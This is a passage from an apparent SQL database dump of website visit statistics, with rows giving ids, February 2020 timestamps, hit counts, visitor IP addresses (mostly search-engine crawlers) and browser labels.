,'8.29.198.25','other'),(483398,1582281703,1,1,0,0,'141.8.142.50','other'),(483399,1582281704,1,1,0,0,'46.211.130.105','chrome'),(483400,1582281785,1,1,0,0,'37.53.228.106','chrome'),(483401,1582281844,1,1,0,0,'5.45.207.65','other'),(483402,1582281847,1,1,0,0,'95.108.213.55','other'),(483403,1582282209,1,1,0,0,'141.8.142.115','other'),(483404,1582282812,2,2,0,0,'66.249.64.27','chrome'),(483405,1582283438,1,1,0,0,'141.8.142.164','other'),(483406,1582284035,1,1,0,0,'109.74.154.72','chrome'),(483407,1582284084,1,1,0,0,'207.46.13.225','other'),(483408,1582284505,1,1,0,0,'178.154.171.33','other'),(483409,1582284593,1,1,0,0,'141.8.183.100','other'),(483410,1582284684,1,1,0,0,'66.249.64.28','chrome'),(483411,1582284691,1,1,0,0,'31.13.127.7','other'),(483412,1582284692,1,1,0,0,'31.13.127.4','other'),(483413,1582285222,1,1,0,0,'141.8.188.12','other'),(483414,1582285539,1,1,0,0,'87.250.224.90','other'),(483415,1582285689,2,2,0,0,'66.249.64.27','chrome'),(483416,1582286318,1,1,0,0,'141.8.142.164','other'),(483417,1582286752,1,1,0,0,'66.249.64.27','chrome'),(483418,1582286791,1,1,0,0,'207.46.13.20','other'),(483419,1582287163,1,1,0,0,'5.255.253.8','other'),(483420,1582287167,1,1,0,0,'141.8.188.20','other'),(483421,1582287200,1,1,0,0,'141.8.188.25','other'),(483422,1582287695,1,1,0,0,'37.9.113.33','other'),(483423,1582287698,1,1,0,0,'141.8.142.177','other'),(483424,1582287776,1,1,0,0,'66.249.64.28','chrome'),(483425,1582287818,1,1,0,0,'207.46.13.20','other'),(483426,1582288159,1,1,0,0,'66.249.64.27','chrome'),(483427,1582288220,1,1,0,0,'66.249.64.26','chrome'),(483428,1582288392,1,1,0,0,'5.45.207.49','other'),(483429,1582288581,1,1,0,0,'141.8.188.20','other'),(483430,1582288726,1,1,0,0,'141.8.183.73','other'),(483431,1582288863,1,1,0,0,'193.28.177.244','chrome'),(483432,1582289143,3,1,2,0,'207.46.13.20',''),(483433,1582289579,3,3,0,0,'207.46.13.251','other'),(483434,1582289653,1,1,0,0,'91.209.11.236','other'),(483435,1582290034,1,1,0,0,'8.29.198.25','other'),(483436,1582290105,1,1,0,0,'141.8.188.12','other'),(483437,1582290843,1,1,0,0,'207.46.13.225','other'),(483438,1582290967,1,1,0,0,'209.17.96.2','other'),(483439,1582291685,1,1,0,0,'141.8.188.38','other'),(483440,1582291974,1,1,0,0,'66.249.70.62','chrome'),(483441,1582292077,2,2,0,0,'66.249.64.27','chrome'),(483442,1582292273,1,1,0,0,'207.46.13.225','other'),(483443,1582292307,1,1,0,0,'46.133.116.86','other'),(483444,1582292344,1,1,0,0,'31.13.127.22','other'),(483445,1582292345,1,1,0,0,'31.13.127.12','other'),(483446,1582292542,1,1,0,0,'8.29.198.27','other'),(483447,1582293452,1,1,0,0,'141.8.142.164','other'),(483448,1582293533,1,1,0,0,'37.9.113.33','other'),(483449,1582293567,1,1,0,0,'141.8.183.53','other'),(483450,1582293586,1,1,0,0,'141.8.142.119','other'),(483451,1582293643,1,1,0,0,'207.46.13.225','other'),(483452,1582294198,1,1,0,0,'178.154.171.134','other'),(483453,1582294310,1,1,0,0,'66.249.64.28','chrome'),(483454,1582294709,1,1,0,0,'37.9.113.10','other'),(483455,1582294779,1,1,0,0,'207.46.13.225','other'),(483456,1582295155,1,1,0,0,'91.196.178.145','firefox'),(483457,1582295201,1,1,0,0,'111.94.112.166','chrome'),(483458,1582295872,1,1,0,0,'207.46.13.225','other'),(483459,1582296629,1,1,0,0,'207.46.13.20','other'),(483460,1582297038,1,1,0,0,'5.45.207.65','other'),(483461,1582297440,1,1,0,0,'31.13.127.3','other'),(483462,1582298048,1,0,1,0,'66.249.64.28',''),(483463,1582299413,1,1,0,0,'5.45.207.49','other'),(483464,1582299781,1,1,0,0,'207.46.13.225','other'),(483465,1582301088,1,1,0,0,'8.29.198.25','other'),(483466,1582301259,1,1,0,0,'207.46.13.225','other'),(483467,1582301410,1,1,0,0,'66.249.64.26','chrome'),(483468,1582301894,1,1,0,0,'93.175.222.190','chrome'),(483469,1582301927,1,1,0,0,'66.249.64.27','chrome'),(483470,1582301983,2,2,0,0,'207.46.13.251','other'),(483471,1582302016,1,0,1,0,'207.46.13.20',''),(483472,1582302029,1,0,1,0,'207.46.13.60',''),(483473,1582302423,1,1,0,0,'87.250.224.90','other'),(483474,1582302510,2,2,0,0,'141.8.188.38','other'),(483475,1582302564,1,1,0,0,'37.9.113.33','other'),(483476,1582302696,1,1,0,0,'66.249.70.62','chrome'),(483477,1582302699,1,1,0,0,'141.8.188.18','other'),(483478,1582302752,1,1,0,0,'141.8.188.20','other'),(483479,1582302769,1,1,0,0,'37.9.113.202','other'),(483480,1582303299,1,0,1,0,'207.46.13.20',''),(483481,1582303329,1,1,0,0,'178.154.171.134','other'),(483482,1582303576,1,1,0,0,'8.29.198.27','other'),(483483,1582303606,1,1,0,0,'66.249.64.26','chrome'),(483484,1582303799,1,1,0,0,'141.8.188.20','other'),(483485,1582304016,1,1,0,0,'141.8.132.12','other'),(483486,1582304034,1,1,0,0,'34.76.164.21','chrome'),(483487,1582304433,1,0,1,0,'207.46.13.60',''),(483488,1582304495,1,1,0,0,'66.249.64.28','chrome'),(483489,1582304795,1,1,0,0,'66.249.64.26','chrome'),(483490,1582305249,1,1,0,0,'141.8.188.38','other'),(483491,1582305405,1,1,0,0,'37.9.113.10','other'),(483492,1582305627,1,1,0,0,'91.196.178.79','firefox'),(483493,1582305663,1,1,0,0,'34.93.188.33','firefox'),(483494,1582305716,1,1,0,0,'37.9.113.142','other'),(483495,1582306385,1,1,0,0,'178.154.171.127','other'),(483496,1582306491,1,1,0,0,'66.249.64.27','chrome'),(483497,1582306513,1,1,0,0,'95.108.213.3','other'),(483498,1582306516,1,1,0,0,'141.8.183.111','other'),(483499,1582307080,2,2,0,0,'66.249.64.28','chrome'),(483500,1582307638,1,1,0,0,'141.8.142.164','other'),(483501,1582307914,1,1,0,0,'130.0.57.73','chrome'),(483502,1582308166,1,1,0,0,'141.8.142.50','other'),(483503,1582308302,1,1,0,0,'178.17.167.172','msie'),(483504,1582308517,1,1,0,0,'66.249.64.27','chrome'),(483505,1582309093,1,1,0,0,'207.46.13.20','other'),(483506,1582309658,1,1,0,0,'207.46.13.60','other'),(483507,1582310052,1,1,0,0,'207.46.13.20','other'),(483508,1582310068,1,1,0,0,'66.249.64.28','chrome'),(483509,1582310243,1,1,0,0,'5.45.207.49','other'),(483510,1582310502,1,1,0,0,'157.55.39.247','other'),(483511,1582311929,1,1,0,0,'66.249.64.27','chrome'),(483512,1582312068,1,1,0,0,'207.46.13.60','other'),(483513,1582312326,1,1,0,0,'8.29.198.27','other'),(483514,1582312438,1,1,0,0,'157.55.39.247','other'),(483515,1582312606,1,1,0,0,'141.8.188.18','other'),(483516,1582313617,1,1,0,0,'207.46.13.20','other'),(483517,1582313706,1,1,0,0,'141.8.188.20','other'),(483518,1582313872,1,1,0,0,'178.154.171.127','other'),(483519,1582313875,1,1,0,0,'37.9.113.6','other'),(483520,1582313966,1,1,0,0,'141.8.142.50','other'),(483521,1582313992,1,1,0,0,'207.46.13.60','other'),(483522,1582314205,1,1,0,0,'141.8.132.12','other'),(483523,1582314273,1,1,0,0,'5.45.207.49','other'),(483524,1582314308,1,1,0,0,'95.108.213.3','other'),(483525,1582314565,1,1,0,0,'8.29.198.26','other'),(483526,1582314603,1,1,0,0,'141.8.142.115','other'),(483527,1582314866,1,1,0,0,'66.249.64.27','chrome'),(483528,1582315407,1,0,1,0,'207.46.13.20',''),(483529,1582315729,1,1,0,0,'141.8.188.25','other'),(483530,1582315755,1,1,0,0,'66.249.70.33','chrome'),(483531,1582315787,1,1,0,0,'173.252.111.11','other'),(483532,1582315788,1,1,0,0,'173.252.111.4','other'),(483533,1582316038,1,1,0,0,'173.252.111.16','other'),(483534,1582316039,1,1,0,0,'173.252.111.8','other'),(483536,1582316076,1,1,0,0,'141.8.142.132','other'),(483537,1582316102,1,1,0,0,'87.250.224.90','other'),(483538,1582316104,1,1,0,0,'141.8.142.128','other'),(483539,1582316684,1,1,0,0,'178.154.171.7','other'),(483540,1582317056,1,1,0,0,'141.8.132.12','other'),(483541,1582317513,1,1,0,0,'66.249.64.28','chrome'),(483542,1582317891,1,1,0,0,'87.250.224.90','other'),(483543,1582317915,1,1,0,0,'141.8.142.50','other'),(483544,1582318482,2,2,0,0,'141.8.142.119','other'),(483545,1582318537,1,1,0,0,'66.249.64.27','chrome'),(483546,1582318814,1,1,0,0,'91.124.181.19','chrome'),(483547,1582318981,1,1,0,0,'178.154.171.134','other'),(483548,1582319112,1,1,0,0,'178.93.148.253','other'),(483549,1582319554,1,1,0,0,'141.8.183.100','other'),(483550,1582319697,1,1,0,0,'141.8.183.67','other'),(483551,1582319730,1,1,0,0,'157.55.39.222','other'),(483552,1582319736,1,1,0,0,'66.249.64.26','chrome'),(483553,1582320110,1,1,0,0,'141.8.188.25','other'),(483554,1582320201,1,1,0,0,'66.249.64.28','chrome'),(483555,1582320956,1,1,0,0,'66.249.64.26','chrome'),(483556,1582321046,1,1,0,0,'178.154.171.134','other'),(483558,1582321304,1,1,0,0,'207.46.13.60','other'),(483559,1582321460,1,1,0,0,'141.8.183.100','other'),(483560,1582321617,1,1,0,0,'178.154.171.127','other'),(483561,1582322077,1,1,0,0,'141.8.142.50','other'),(483562,1582322571,1,1,0,0,'141.8.188.20','other'),(483563,1582322774,1,1,0,0,'141.8.142.164','other'),(483564,1582322952,1,1,0,0,'66.249.64.27','chrome'),(483565,1582323303,1,1,0,0,'66.249.70.62','chrome'),(483566,1582323355,1,0,1,0,'66.249.64.28',''),(483567,1582323378,1,1,0,0,'8.29.198.25','other'),(483568,1582323417,1,1,0,0,'66.249.64.26','chrome'),(483569,1582324073,1,1,0,0,'37.9.113.200','other'),(483570,1582324168,1,1,0,0,'141.8.142.164','other'),(483571,1582324192,1,1,0,0,'66.249.70.36','chrome'),(483572,1582324239,1,1,0,0,'37.9.113.142','other'),(483573,1582324771,1,1,0,0,'66.249.64.26','chrome'),(483574,1582325079,1,1,0,0,'141.8.142.115','other'),(483575,1582325081,1,1,0,0,'37.9.113.6','other'),(483576,1582325589,1,1,0,0,'8.29.198.27','other'),(483577,1582325693,1,1,0,0,'141.8.183.100','other'),(483578,1582326212,1,1,0,0,'141.8.142.164','other'),(483579,1582326343,1,1,0,0,'66.249.64.27','chrome'),(483580,1582326386,1,1,0,0,'141.8.142.119','other'),(483581,1582326451,1,1,0,0,'31.13.127.3','other'),(483582,1582326596,1,1,0,0,'141.8.188.18','other'),(483583,1582326612,1,1,0,0,'157.55.39.247','other'),(483584,1582326656,1,1,0,0,'37.9.113.33','other'),(483585,1582326777,1,1,0,0,'66.249.64.28','chrome'),(483586,1582327078,1,1,0,0,'207.46.13.20','other'),(483587,1582327253,1,1,0,0,'207.46.13.60','other'),(483588,1582328236,1,1,0,0,'66.249.64.26','chrome'),(483589,1582328339,1,1,0,0,'66.249.70.36','chrome'),(483590,1582328920,1,1,0,0,'141.8.142.164','other'),(483591,1582329148,1,1,0,0,'141.8.183.53','other'),(483592,1582329425,2,2,0,0,'185.49.1.99','chrome'),(483593,1582329450,1,1,0,0,'141.8.132.12','other'),(483594,1582329499,1,1,0,0,'207.46.13.37','other'),(483595,1582329564,1,1,0,0,'141.8.188.38','other'),(483596,1582329567,1,1,0,0,'141.8.142.177','other'),(483597,1582329604,1,1,0,0,'5.45.207.65','other'),(483598,1582329957,1,1,0,0,'87.250.224.90','other'),(483599,1582330520,1,1,0,0,'141.8.142.50','other'),(483600,1582330929,1,1,0,0,'178.154.171.7','other'),(483601,1582331012,1,1,0,0,'91.209.11.236','other'),(483602,1582331197,1,1,0,0,'141.8.183.53','other'),(483603,1582331309,1,1,0,0,'198.108.66.240','other'),(483604,1582331969,1,1,0,0,'141.8.188.12','other'),(483605,1582331999,2,2,0,0,'66.249.64.26','chrome'),(483606,1582332041,1,1,0,0,'66.249.70.62','chrome'),(483607,1582332082,1,1,0,0,'66.249.64.28','chrome'),(483608,1582332133,1,1,0,0,'66.249.64.27','chrome'),(483609,1582332559,1,1,0,0,'207.46.13.37','other'),(483610,1582332638,1,1,0,0,'37.9.113.200','other'),(483611,1582332913,1,1,0,0,'62.205.134.182','other'),(483612,1582332929,1,1,0,0,'141.8.188.12','other'),(483613,1582333405,1,1,0,0,'66.249.64.27','chrome'),(483614,1582333529,1,1,0,0,'66.249.64.26','chrome'),(483615,1582333749,1,1,0,0,'95.108.213.3','other'),(483616,1582334159,2,2,0,0,'141.8.183.67','other'),(483617,1582334162,1,1,0,0,'141.8.142.44','other'),(483618,1582334360,1,1,0,0,'8.29.198.27','other'),(483619,1582334757,1,1,0,0,'87.250.224.90','other'),(483620,1582334967,1,1,0,0,'141.8.132.37','other'),(483621,1582335259,1,1,0,0,'141.8.132.12','other'),(483622,1582335460,1,1,0,0,'141.8.188.25','other'),(483623,1582335890,1,1,0,0,'207.46.13.37','other'),(483624,1582335949,1,1,0,0,'66.249.64.28','chrome'),(483625,1582336334,1,1,0,0,'178.154.171.134','other'),(483626,1582336386,1,1,0,0,'157.55.39.247','other'),(483627,1582336591,1,1,0,0,'8.29.198.25','other'),(483628,1582336937,1,1,0,0,'157.55.39.222','other'),(483629,1582336977,1,1,0,0,'141.8.183.73','other'),(483630,1582337782,1,1,0,0,'141.8.188.66','other'),(483631,1582337785,1,1,0,0,'178.154.171.66','other'),(483632,1582338201,1,1,0,0,'37.9.113.142','other'),(483633,1582338417,1,1,0,0,'141.8.142.115','other'),(483634,1582338516,1,1,0,0,'91.209.11.236','other'),(483635,1582338750,1,1,0,0,'141.8.188.18','other'),(483636,1582339490,1,1,0,0,'141.8.183.53','other'),(483637,1582339745,2,2,0,0,'5.45.207.65','other'),(483638,1582339955,1,1,0,0,'157.55.39.247','other'),(483639,1582340193,1,1,0,0,'178.154.171.134','other'),(483640,1582340649,1,1,0,0,'8.29.198.29','other'),(483641,1582340839,2,2,0,0,'141.8.183.53','other'),(483642,1582340842,1,1,0,0,'87.250.224.104','other'),(483643,1582341092,1,1,0,0,'141.8.142.119','other'),(483644,1582341141,2,2,0,0,'207.46.13.31','other'),(483645,1582341383,1,1,0,0,'141.8.188.38','other'),(483646,1582341538,1,1,0,0,'141.8.183.73','other'),(483647,1582341558,1,1,0,0,'141.8.142.164','other'),(483648,1582341586,1,1,0,0,'141.8.132.12','other'),(483649,1582341596,1,1,0,0,'141.8.132.37','other'),(483650,1582342199,1,1,0,0,'66.249.64.26','chrome'),(483651,1582343148,2,2,0,0,'66.249.64.28','chrome'),(483652,1582343582,1,1,0,0,'8.29.198.29','other'),(483653,1582343981,1,1,0,0,'141.8.132.12','other'),(483654,1582344423,1,1,0,0,'95.108.213.3','other'),(483655,1582344797,1,1,0,0,'66.249.64.28','chrome'),(483656,1582344811,1,1,0,0,'37.9.113.177','other'),(483657,1582344831,1,1,0,0,'66.249.64.27','chrome'),(483658,1582345238,1,1,0,0,'207.46.13.37','other'),(483659,1582345355,1,1,0,0,'8.29.198.25','other'),(483660,1582346821,1,1,0,0,'141.8.142.164','other'),(483661,1582347346,1,0,1,0,'207.46.13.37',''),(483662,1582347414,3,3,0,0,'18.188.240.21','chrome'),(483663,1582347557,1,1,0,0,'8.29.198.25','other'),(483664,1582347784,1,1,0,0,'5.3.158.5','firefox'),(483665,1582347886,1,1,0,0,'66.249.64.28','chrome'),(483666,1582348712,1,1,0,0,'157.55.39.247','other'),(483667,1582349314,1,1,0,0,'66.249.64.28','chrome'),(483668,1582349569,2,2,0,0,'66.249.64.26','chrome'),(483669,1582349985,1,1,0,0,'62.205.134.182','other'),(483670,1582350883,1,1,0,0,'157.55.39.247','other'),(483671,1582350903,1,1,0,0,'37.9.113.200','other'),(483672,1582351405,1,1,0,0,'66.249.70.62','chrome'),(483673,1582351472,1,1,0,0,'37.9.113.142','other'),(483674,1582351765,1,1,0,0,'66.249.64.28','chrome'),(483675,1582352960,1,1,0,0,'66.249.64.28','chrome'),(483676,1582353216,1,1,0,0,'66.249.64.27','chrome'),(483677,1582354561,2,2,0,0,'207.46.13.37','other'),(483678,1582355481,1,1,0,0,'66.249.64.26','chrome'),(483679,1582356303,1,1,0,0,'8.29.198.25','other'),(483680,1582356502,1,1,0,0,'66.249.64.27','chrome'),(483681,1582358529,1,1,0,0,'8.29.198.27','other'),(483682,1582360126,1,1,0,0,'8.29.198.29','other'),(483683,1582360245,1,1,0,0,'194.12.78.48','chrome'),(483684,1582360433,2,2,0,0,'157.55.39.247','other'),(483685,1582360452,1,1,0,0,'207.46.13.31','other'),(483686,1582360532,1,0,1,0,'66.249.64.27',''),(483687,1582360780,1,1,0,0,'173.252.111.5','other'),(483688,1582360781,1,1,0,0,'173.252.111.9','other'),(483689,1582361989,1,1,0,0,'207.46.13.31','other'),(483690,1582362030,2,2,0,0,'207.46.13.37','other'),(483691,1582362077,1,1,0,0,'66.249.64.28','chrome'),(483692,1582362972,1,1,0,0,'207.46.13.37','other'),(483693,1582362974,1,1,0,0,'8.29.198.29','other'),(483694,1582363726,1,1,0,0,'66.249.64.26','chrome'),(483695,1582364347,1,1,0,0,'209.90.225.218','chrome'),(483696,1582365619,2,2,0,0,'66.249.64.28','chrome'),(483697,1582365631,1,1,0,0,'66.249.70.62','chrome'),(483698,1582366668,1,1,0,0,'185.183.96.122','chrome'),(483699,1582366931,1,1,0,0,'66.249.64.26','chrome'),(483700,1582367008,1,1,0,0,'37.9.113.200','other'),(483701,1582367012,1,1,0,0,'66.249.70.62','chrome'),(483702,1582367210,1,1,0,0,'66.249.64.28','chrome'),(483703,1582367211,1,1,0,0,'87.250.224.90','other'),(483704,1582367283,1,1,0,0,'8.29.198.25','other'),(483705,1582367316,1,1,0,0,'49.12.3.155','other'),(483706,1582367709,1,1,0,0,'37.9.113.6','other'),(483707,1582367914,1,1,0,0,'46.211.138.206','chrome'),(483708,1582369244,1,1,0,0,'207.46.13.31','other'),(483709,1582369488,1,1,0,0,'8.29.198.25','other'),(483710,1582370289,1,1,0,0,'141.8.188.12','other'),(483711,1582370400,1,1,0,0,'109.74.154.72','chrome'),(483712,1582370716,1,1,0,0,'207.46.13.31','other'),(483713,1582370977,1,1,0,0,'141.8.183.67','other'),(483714,1582371200,1,1,0,0,'141.8.132.12','other'),(483715,1582371339,1,1,0,0,'141.8.188.38','other'),(483716,1582371684,1,1,0,0,'141.8.142.164','other'),(483717,1582371729,2,2,0,0,'207.46.13.31','other'),(483718,1582371816,1,1,0,0,'141.8.183.53','other'),(483719,1582372118,1,1,0,0,'91.209.11.236','other'),(483720,1582372449,1,1,0,0,'141.8.132.12','other'),(483721,1582372609,1,1,0,0,'141.8.183.67','other'),(483722,1582373167,1,1,0,0,'37.9.113.10','other'),(483723,1582373170,1,1,0,0,'141.8.132.2','other'),(483724,1582374216,1,1,0,0,'141.8.183.53','other'),(483725,1582374671,1,1,0,0,'207.46.13.31','other'),(483726,1582376674,1,0,1,0,'157.55.39.247',''),(483727,1582376813,1,1,0,0,'66.249.64.28','chrome'),(483728,1582376988,1,1,0,0,'66.249.64.27','chrome'),(483729,1582377085,1,1,0,0,'198.108.66.112','other'),(483730,1582377197,4,4,0,0,'207.46.13.37','other'),(483731,1582377860,1,1,0,0,'5.45.207.65','other'),(483732,1582378243,1,1,0,0,'8.29.198.26','other'),(483733,1582378440,1,1,0,0,'87.250.224.90','other'),(483734,1582379258,1,1,0,0,'178.154.171.7','other'),(483735,1582380100,1,1,0,0,'66.249.64.28','chrome'),(483736,1582380456,1,1,0,0,'8.29.198.26','other'),(483737,1582380762,2,2,0,0,'66.249.64.26','chrome'),(483738,1582380777,1,1,0,0,'207.46.13.31','other'),(483739,1582381128,2,2,0,0,'31.13.127.12','other'),(483740,1582381130,1,1,0,0,'31.13.127.13','other'),(483741,1582381185,1,1,0,0,'178.154.171.66','other'),(483742,1582381622,1,1,0,0,'141.8.142.177','other'),(483743,1582381690,1,1,0,0,'66.249.64.26','chrome'),(483744,1582382248,1,1,0,0,'66.249.64.27','chrome'),(483745,1582382316,1,0,1,0,'157.55.39.247',''),(483746,1582382624,1,1,0,0,'141.8.132.12','other'),(483747,1582382640,1,1,0,0,'178.154.171.66','other'),(483748,1582382853,1,1,0,0,'66.249.70.36','chrome'),(483749,1582383147,1,1,0,0,'66.249.64.26','chrome'),(483750,1582383615,1,0,1,0,'157.55.39.247',''),(483751,1582383645,1,1,0,0,'66.249.64.28','chrome'),(483752,1582383675,1,1,0,0,'95.108.213.3','other'),(483753,1582383971,1,1,0,0,'87.250.224.90','other'),(483754,1582384516,3,3,0,0,'178.154.171.127','other'),(483755,1582384849,1,1,0,0,'66.249.64.26','chrome'),(483756,1582385182,2,2,0,0,'178.154.171.134','other'),(483757,1582385602,1,0,1,0,'207.46.13.31',''),(483758,1582385767,1,1,0,0,'66.249.65.126','chrome'),(483759,1582385801,1,1,0,0,'141.8.188.38','other'),(483760,1582385959,1,1,0,0,'178.154.171.7','other'),(483761,1582385961,1,1,0,0,'141.8.142.164','other'),(483762,1582385965,1,1,0,0,'141.8.142.132','other'),(483763,1582386267,1,1,0,0,'95.108.213.55','other'),(483764,1582386937,1,1,0,0,'141.8.183.111','other'),(483765,1582387227,1,1,0,0,'198.108.66.144','other'),(483766,1582387462,2,2,0,0,'66.249.65.101','chrome'),(483767,1582387563,2,2,0,0,'178.154.171.127','other'),(483768,1582387697,1,1,0,0,'178.154.171.134','other'),(483769,1582388647,1,1,0,0,'66.249.65.98','chrome'),(483770,1582388813,1,1,0,0,'207.46.13.37','other'),(483771,1582389192,1,1,0,0,'8.29.198.25','other'),(483772,1582389645,1,1,0,0,'66.249.65.126','chrome'),(483773,1582389718,1,1,0,0,'207.46.13.37','other'),(483774,1582390699,1,0,1,0,'207.46.13.31',''),(483775,1582390766,1,1,0,0,'66.249.65.98','chrome'),(483776,1582390810,1,1,0,0,'141.8.142.2','other'),(483777,1582391381,4,4,0,0,'95.91.15.244','other'),(483778,1582391426,1,1,0,0,'8.29.198.27','other'),(483779,1582391511,1,1,0,0,'66.249.65.126','chrome'),(483780,1582392242,1,1,0,0,'157.55.39.247','other'),(483781,1582392648,1,1,0,0,'5.255.253.8','other'),(483782,1582392672,3,3,0,0,'207.46.13.37','other'),(483783,1582392962,1,1,0,0,'66.249.65.126','chrome'),(483784,1582393089,1,1,0,0,'141.8.142.2','other'),(483785,1582393217,1,1,0,0,'37.9.113.6','other'),(483786,1582393863,1,1,0,0,'207.46.13.37','other'),(483787,1582394148,1,1,0,0,'178.154.171.127','other'),(483788,1582394589,2,2,0,0,'178.154.171.134','other'),(483789,1582394717,1,1,0,0,'116.193.170.50','chrome'),(483790,1582394844,1,0,1,0,'207.46.13.37',''),(483791,1582394872,1,1,0,0,'31.13.127.16','other'),(483792,1582394873,1,1,0,0,'31.13.127.6','other'),(483794,1582394989,1,1,0,0,'157.55.39.247','other'),(483795,1582395554,3,3,0,0,'178.154.171.127','other'),(483796,1582395704,1,1,0,0,'207.46.13.31','other'),(483797,1582396784,1,1,0,0,'207.46.13.31','other'),(483798,1582396937,1,1,0,0,'66.249.65.101','chrome'),(483799,1582397121,2,2,0,0,'178.154.171.134','other'),(483800,1582397248,1,1,0,0,'66.249.65.98','chrome'),(483801,1582398700,1,1,0,0,'66.249.65.126','chrome'),(483802,1582398951,1,1,0,0,'207.46.13.31','other'),(483803,1582399207,2,2,0,0,'204.12.197.234','other'),(483804,1582399291,1,1,0,0,'178.154.171.127','other'),(483805,1582399517,2,2,0,0,'178.154.171.134','other'),(483806,1582399679,1,1,0,0,'167.71.210.190','other'),(483807,1582400151,1,1,0,0,'8.29.198.26','other'),(483808,1582400174,1,1,0,0,'66.249.65.98','chrome'),(483809,1582401007,2,2,0,0,'178.154.171.127','other'),(483810,1582401458,1,1,0,0,'178.154.171.134','other'),(483811,1582401876,1,1,0,0,'157.55.39.247','other'),(483812,1582401960,1,1,0,0,'66.249.65.126','chrome'),(483813,1582402121,2,1,1,0,'207.46.13.37',''),(483814,1582402404,1,1,0,0,'8.29.198.26','other'),(483815,1582402443,1,1,0,0,'66.249.65.98','chrome'),(483816,1582402451,1,1,0,0,'178.154.171.127','other'),(483817,1582402664,2,1,1,0,'207.46.13.31',''),(483818,1582402986,1,1,0,0,'5.45.207.65','other'),(483819,1582403130,1,1,0,0,'178.154.171.134','other'),(483820,1582403857,1,1,0,0,'141.8.183.53','other'),(483821,1582404090,1,1,0,0,'66.249.65.101','chrome'),(483822,1582405082,1,1,0,0,'66.249.73.161','chrome'),(483823,1582405347,1,1,0,0,'141.8.183.100','other'),(483824,1582405413,1,1,0,0,'178.154.171.127','other'),(483825,1582406247,2,2,0,0,'207.46.13.31','other'),(483826,1582407025,4,4,0,0,'178.154.171.134','other'),(483827,1582407097,1,1,0,0,'66.249.65.126','chrome'),(483828,1582407682,1,0,1,0,'207.46.13.37',''),(483829,1582408185,3,3,0,0,'178.154.171.134','other'),(483830,1582408852,1,1,0,0,'141.8.142.2','other'),(483831,1582408903,1,0,1,0,'207.46.13.31',''),(483832,1582409126,1,0,1,0,'66.249.65.126',''),(483833,1582409597,1,1,0,0,'66.249.65.98','chrome'),(483834,1582409750,1,1,0,0,'157.55.39.247','other'),(483835,1582409865,1,1,0,0,'46.4.33.48','other'),(483836,1582410741,1,1,0,0,'207.46.13.31','other'),(483837,1582410850,12,12,0,0,'54.165.76.168','other'),(483838,1582410973,1,0,1,0,'157.55.39.247',''),(483839,1582411101,1,1,0,0,'8.29.198.26','other'),(483840,1582411106,2,2,0,0,'141.8.183.73','other'),(483841,1582411153,1,1,0,0,'66.249.65.101','chrome'),(483842,1582411175,1,1,0,0,'66.249.65.98','chrome'),(483843,1582411340,1,1,0,0,'137.226.113.28','other'),(483844,1582412421,3,3,0,0,'178.154.171.134','other'),(483845,1582412719,1,1,0,0,'66.249.65.98','chrome'),(483846,1582413372,1,1,0,0,'8.29.198.25','other'),(483847,1582413855,3,3,0,0,'178.154.171.134','other'),(483848,1582413916,1,1,0,0,'34.205.8.150','chrome'),(483849,1582414079,1,1,0,0,'66.249.73.161','chrome'),(483850,1582414170,1,1,0,0,'66.249.65.126','chrome'),(483851,1582414217,1,1,0,0,'66.249.65.101','chrome'),(483852,1582414615,1,1,0,0,'66.102.9.191','chrome'),(483853,1582414950,1,1,0,0,'178.154.171.134','other'),(483854,1582415044,1,1,0,0,'178.154.171.66','other'),(483855,1582415047,1,1,0,0,'87.250.224.90','other'),(483856,1582415346,1,1,0,0,'141.8.132.12','other'),(483857,1582415457,1,1,0,0,'207.46.13.37','other'),(483858,1582415495,2,2,0,0,'157.55.39.247','other'),(483859,1582415732,1,1,0,0,'178.154.171.127','other'),(483860,1582415933,1,1,0,0,'66.249.65.98','chrome'),(483861,1582416732,1,1,0,0,'157.55.39.247','other'),(483862,1582416756,1,1,0,0,'178.154.171.127','other'),(483863,1582416907,3,3,0,0,'178.154.171.134','other'),(483864,1582416976,1,1,0,0,'207.46.13.37','other'),(483865,1582416981,1,1,0,0,'141.8.142.2','other'),(483866,1582417000,1,1,0,0,'141.8.183.111','other'),(483867,1582417223,1,1,0,0,'66.249.65.101','chrome'),(483868,1582417550,2,2,0,0,'31.13.103.11','other'),(483870,1582417551,1,1,0,0,'31.13.103.14','other'),(483873,1582417552,1,1,0,0,'31.13.103.24','other'),(483876,1582418161,1,1,0,0,'207.46.13.31','other'),(483877,1582418412,4,4,0,0,'178.154.171.134','other'),(483878,1582418479,1,1,0,0,'66.249.73.164','chrome'),(483879,1582419313,1,1,0,0,'62.205.134.182','other'),(483880,1582419632,2,2,0,0,'66.249.65.126','chrome'),(483881,1582419962,4,4,0,0,'178.154.171.134','other'),(483882,1582420000,1,1,0,0,'178.154.171.127','other'),(483883,1582420092,1,1,0,0,'66.249.65.101','chrome'),(483884,1582420443,3,3,0,0,'35.239.236.5','chrome'),(483885,1582420707,3,3,0,0,'35.222.159.156','chrome'),(483886,1582420827,3,3,0,0,'35.238.84.248','chrome'),(483887,1582420839,2,2,0,0,'35.184.80.6','chrome'),(483889,1582420851,4,4,0,0,'34.66.35.238','chrome'),(483891,1582420884,1,1,0,0,'178.154.171.134','other'),(483892,1582421347,1,1,0,0,'66.249.73.190','chrome'),(483893,1582421624,1,1,0,0,'66.249.65.126','chrome'),(483894,1582421958,1,1,0,0,'66.249.65.101','chrome'),(483895,1582422081,1,1,0,0,'8.29.198.25','other'),(483896,1582422119,1,1,0,0,'157.55.39.247','other'),(483897,1582422445,1,1,0,0,'178.154.171.134','other'),(483898,1582422577,1,1,0,0,'178.154.171.127','other'),(483899,1582422664,1,1,0,0,'207.46.13.37','other'),(483900,1582424051,1,0,1,0,'157.55.39.247',''),(483901,1582424354,1,1,0,0,'8.29.198.25','other'),(483902,1582424506,1,1,0,0,'178.154.171.66','other'),(483903,1582424767,1,1,0,0,'141.8.132.37','other'),(483904,1582424960,1,1,0,0,'157.55.39.247','other'),(483905,1582424973,1,1,0,0,'141.8.183.73','other'),(483906,1582425702,1,1,0,0,'66.249.73.161','chrome'),(483907,1582426104,1,1,0,0,'66.249.73.190','chrome'),(483908,1582427111,4,4,0,0,'207.46.13.37','other'),(483909,1582427217,1,1,0,0,'178.154.171.134','other'),(483910,1582427457,1,1,0,0,'178.154.171.127','other'),(483911,1582427648,2,2,0,0,'207.46.13.31','other'),(483912,1582428717,3,3,0,0,'178.154.171.134','other'),(483913,1582429157,1,1,0,0,'207.46.13.31','other'),(483914,1582429236,1,0,1,0,'207.46.13.37',''),(483915,1582429687,1,1,0,0,'178.154.171.134','other'),(483916,1582430142